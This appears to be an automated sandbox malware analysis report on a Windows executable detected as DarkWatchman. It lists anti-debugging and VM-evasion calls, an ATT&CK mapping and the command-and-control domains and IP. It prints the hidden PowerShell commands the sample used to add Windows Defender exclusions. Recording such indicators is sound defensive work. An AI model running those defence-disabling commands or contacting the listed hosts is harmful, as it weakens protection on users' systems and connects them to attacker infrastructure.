0_2_00BDD3A8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 0000000B.00000002.3371056470.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWv
Source: YyVnwn8Zst.exe, 00000000.00000002.2126187769.0000000001132000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3371056470.0000000005A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8Q7

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

API call chain: ExitProcess graph end node

graph_0-24430

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BDE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BDE4F5

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BE6B19 mov eax, dword ptr fs:[00000030h]

0_2_00BE6B19

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BEACFC GetProcessHeap,

0_2_00BEACFC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BDE4F5
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDE643 SetUnhandledExceptionFilter,	0_2_00BDE643
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDE7FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BDE7FC
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BE7C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BE7C57

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 185.159.131.230 443

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BDE34B cpuid

0_2_00BDE34B

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00BD9E0C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BDCC0E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_00BDCC0E

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BCAA39 GetVersionExW,

0_2_00BCAA39

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370809663.00000000053B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3371056470.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected DarkWatchman

Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4836, type: MEMORYSTR

Remote Access Functionality

Yara detected DarkWatchman

Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4836, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	221 Windows Management Instrumentation	11 Scripting	111 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	51 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	46 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://bd0baba4.site/index.php-N	0%	Avira URL Cloud	safe
https://bd0baba4.site/index.phpP	0%	Avira URL Cloud	safe
https://bd0ba/index.php	0%	Avira URL Cloud	safe
https://bd0baba4.site/w	0%	Avira URL Cloud	safe
https://bd0baba4.store/in	0%	Avira URL Cloud	safe
https://bd0baba4.online/index.php	0%	Avira URL Cloud	safe
https://bd0baba4.site	0%	Avira URL Cloud	safe
https://bd0baba4.site/index.php_P	0%	Avira URL Cloud	safe
https://bd0baba4.store/index.php	0%	Avira URL Cloud	safe
https://bd0baba4.sitehp	0%	Avira URL Cloud	safe
https://bd0baba4.site:443/index.php	0%	Avira URL Cloud	safe
https://bd0baba4.site/index.phpdll	0%	Avira URL Cloud	safe
https://bd0baba4.store/index.phpo	0%	Avira URL Cloud	safe
https://bd0baba4.site/l	0%	Avira URL Cloud	safe
https://bd0baba4.site/	0%	Avira URL Cloud	safe
https://bd0baba4.site/index.	0%	Avira URL Cloud	safe
https://bd0baba4.site/IW	0%	Avira URL Cloud	safe
https://bd0baba4.site/index.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bd0baba4.site	185.159.131.230	true	true	unknown
bd0baba4.online	unknown	unknown	false	unknown
bd0baba4.store	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bd0baba4.site/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bd0baba4.site	wscript.exe, 0000000A.00000002.3369313927.00000000006F9000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/index.php-N	wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.store/in	wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.online/index.php	wscript.exe, 0000000A.00000002.3370693123.00000000051DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370131318.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370436183.000000000544D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370834799.0000000005895000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
